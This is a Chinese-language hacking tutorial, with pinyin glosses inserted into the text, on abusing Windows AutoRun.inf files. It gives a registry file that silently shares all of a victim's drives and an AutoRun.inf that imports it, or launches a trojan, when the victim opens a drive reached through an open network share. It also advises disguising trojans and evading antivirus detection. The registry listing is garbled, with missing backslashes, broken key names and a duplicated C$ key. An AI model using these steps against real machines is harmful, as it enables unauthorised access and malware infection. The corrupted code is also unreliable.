最近網上流（liú）行（háng）通過AutoRun.inf文件使（shǐ）對方（fāng）所有的硬盤完全共享或中木馬的方（fāng）法，由於AutoRun.inf文件（jiàn）在黑客技術中（zhōng）的應用還是很少見的，相應的資料也不多，有很多人對此覺得很神秘（mì），本文試圖（tú）為您解開這個迷，使您能完全的了解（jiě）這個（gè）並不複雜卻極其有趣的技術。

　　一、理論基礎

　　經常使用光盤的朋友都知道，有（yǒu）很多光盤放入光驅就會自動運行，它們（men）是怎麽做的呢（ne）？光盤一放入光驅就會自動被執行，主要（yào）依靠兩個文件，一是光盤上的AutoRun.inf文（wén）件，另一個是操作係統（tǒng）本（běn）身的係統文（wén）件之一的Cdvsd.vxd。Cdvsd.vxd會隨時（shí）偵測光驅（qū）中是否有放（fàng）入（rù）光盤的動作，如果有（yǒu）的（de）話，便開始（shǐ）尋找光盤根目錄下的AutoRun.inf文件（jiàn）。如果存在AutoRun.inf文件則執行它（tā）裏麵的預設程序。

　　AutoRun.inf不光能讓（ràng）光盤自動運行程序，也能讓硬盤自動運行程序，方法很簡單，先打開記事本，然後用鼠標右鍵（jiàn）點（diǎn）擊該文（wén）件，在彈出菜單中選擇“重命名”，將其改名為AutoRun.inf，在AutoRun.inf中鍵入以下內容：[AutoRun]//表示AutoRun部分開始，必須（xū）輸入Icon=C:C.ico//給C盤一（yī）個個性化的盤（pán）符圖標C.icoOpen=C:1.exe//指定要（yào）運行（háng）程序的（de）路徑和（hé）名稱，在（zài）此假設（shè）為（wéi）C盤下的1.exe保存（cún）該文件，按F5刷新桌麵，再（zài）看“我的電腦（nǎo）”中的該盤符（fú）（在此為C盤），你會發現它的磁盤圖標變了，雙擊進入C盤，還會（huì）自動播放C盤下的1.exe文件！

　　解釋一下（xià）：“[AutoRun]”行是必須的固定格式，“Icon”行（háng）對應的是圖標文件，“C:C.ico”為（wéi）圖標文件路徑和文件名，你在輸入時可以將它（tā）改為你的圖片文件所在路徑和文件名。另外，“.ico”為圖標文件的（de）擴展名，如果你手（shǒu）頭上沒有（yǒu）這類文件，可以用看圖軟件（jiàn）ACDSee將其他格式的軟件轉換為ico格式，或者找到一個後綴名為BMP的文件（jiàn），將它直接改名為ICO文件即可。

　　“Open”行指定要自動運行的文件及（jí）其盤符和（hé）路（lù）徑。要特別說明的是，如（rú）果你要改變（biàn）的硬盤跟目錄下沒有自動播（bō）放文件，就應該把“OPEN”行刪掉（diào），否則就（jiù）會因為（wéi）找不到自動播放文件而打不開硬盤，此時隻能用（yòng）鼠標右鍵單（dān）擊盤符在彈（dàn）出菜單中選“打開”才行。

　　二、實例

　　下麵就舉個例子：如果你掃到一台開著139共享的機器，而對方（fāng）隻完全共享了D盤，我們要讓對方的所有驅（qū）動器都共（gòng）享。首先編輯一個注冊表文件（jiàn），打開記事本，鍵入以下內容：

　　REGEDIT4

　　'此處一定要空一（yī）行

　　[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion

　　NetworkLanmanC$]

　　"ath"="C:\"

　　"Remark"=""

　　"Type"=dword:00000000

　　"Flags"=dword:00000302

　　"armlenc"=hex:

　　"arm2enc"=hex:

　　[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion

　　NetworkLanmanD$]

　　"ath"="D:\"

　　"Remark"=""

　　"Type"=dword:00000000

　　"Flags"=dword:00000302

　　"armlenc"=hex:

　　"arm2enc"=hex:

　　[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion

　　NetworkLanmanC$]

　　"ath"="E:\"

　　"Remark"=""

　　"Type"=dword:00000000

　　"Flags"=dword:00000302

　　"armlenc"=hex:

　　"arm2enc"=hex:

　　以上我隻設置到E盤，如果對方有很多邏輯（jí）盤符的請自行設置。將以上部分（fèn）另存為Share.reg文件備用。要特別注（zhù）意REGEDIT4為大寫且頂格書寫，其後要空上一行，在最後（hòu）一行記得要按一次回（huí）車鍵。

　　然後（hòu）打（dǎ）開記事（shì）本，編製一（yī）個（gè）AutoRun.inf文件，鍵入以下內容：

　　[AutoRun]

　　Open=regedit/sShare.reg//加/s參數是為了導（dǎo）入時不會顯示任何信（xìn）息保存AutoRun.inf文件。將Share.reg和AutoRun.inf這兩個文件都複製到對方的（de）D盤的根目錄下，這樣對方隻要雙擊D盤就（jiù）會將Share.reg導入注冊表，這樣對方電腦重啟後所有驅動器就會都完全（quán）共（gòng）享出來。

　　如果想讓對（duì）方中木馬，隻要在AutoRun.inf文件中，把“Open=Share.Reg”改成“Open=木（mù）馬服務端（duān）文件名”，然後把AutoRun.inf和配置（zhì）好的木（mù）馬服務端一起複製到對方D盤的根目錄下，這樣（yàng）不需（xū）對方運行木馬服務端程序，而隻需他雙（shuāng）擊D盤就會使木馬運（yùn）行！這樣做的好處顯而（ér）易（yì）見，那就（jiù）是大大的增加了木馬運行的主動性！須知許多人現在都是非常警惕的，不熟（shú）悉（xī）的文件他們輕易的（de）不會運行，而（ér）這種方法就很難防範了。

　　要說明（míng）的是，給你下木馬的人不會那麽蠢的不給木馬（mǎ）加以偽裝，一般說來，他們會給木馬服務端文件改（gǎi）個名字，或好聽或和係統文件名很（hěn）相像，然後給（gěi）木馬換個圖標，使（shǐ）它看起來（lái）像TXT文（wén）件、ZIP文件或圖片文件等，，最後修改（gǎi）木馬的資源文件使其不被殺（shā）毒軟件識別（具（jù）體的方法可以看網上的（de）文章），當服務端用戶（hù）信以為真時，木馬卻悄（qiāo）悄侵入了係統。其實，換個角度理解就不難了——要是您給別人（rén）下木馬我想你也會這樣做的。以上手段再輔以如上內容的AutoRun.inf文件（jiàn）就天衣無縫了！

　　請大家注意：保存的文件名必須是“AutoRun.inf”，編製好的Autorun.inf文件和圖標文件一定要放在硬盤根目錄下。更進一步，如果你的某個硬盤內容暫時比較固定的話，不（bú）妨用Flash做一個自動播放文件，再編上“Autorun”文件，那你就有（yǒu）最酷、最個性的硬盤了。

　　到這兒還沒有完。大家知道，在一些光盤放入後，我們在其圖標上單擊鼠標右鍵，還會（huì）產生一個具有特色的目錄菜單，如果能對著我們的硬盤點擊鼠標右鍵（jiàn）也產生這樣的效（xiào）果，那將更加的有特色。其實，光盤能有這樣的效果也僅僅（jǐn）是因（yīn）為在AutoRun.inf文件中有如（rú）下兩條語句：

　　shell標誌＝顯示的鼠標右鍵菜單中內容

　　shell標誌command＝要執行的文件或命令行

　　所以，要讓硬（yìng）盤（pán）具有特色的目錄菜單，在AutoRun.inf文件中加入上述語句即可